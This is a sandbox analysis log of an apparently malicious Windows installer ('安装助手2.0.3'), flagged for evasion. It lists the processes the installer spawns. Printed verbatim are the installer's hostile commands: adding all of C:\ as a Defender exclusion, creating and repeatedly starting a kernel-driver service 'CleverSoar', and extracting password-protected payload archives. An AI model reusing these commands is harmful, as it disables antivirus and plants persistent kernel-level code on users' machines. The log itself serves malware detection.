Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000000.2075082721.0000000000589000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameb1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exe, 00000000.00000003.2076986431.000000000309E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameb1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeBinary or memory string: OriginalFileNameb1saMLk3dvZDYVRF.exe vs #U5b89#U88c5#U52a9#U624b2.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.drBinary string: \Device\TfSysMon
Source: tProtect.dll.13.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal84.evad.winEXE@133/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6C0B62D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,11_2_003C9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003D3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_003D3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 11_2_003C9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,11_2_003C9252
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpCode function: 7_2_6C0B57B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,7_2_6C0B57B0
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\is-SM8KP.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5240:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6800:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2364:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5492:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3640:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b2.0.3.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$20448,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp" /SL5="$2044C,6284086,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmpSection loaded: edputil.dllJump to behavior
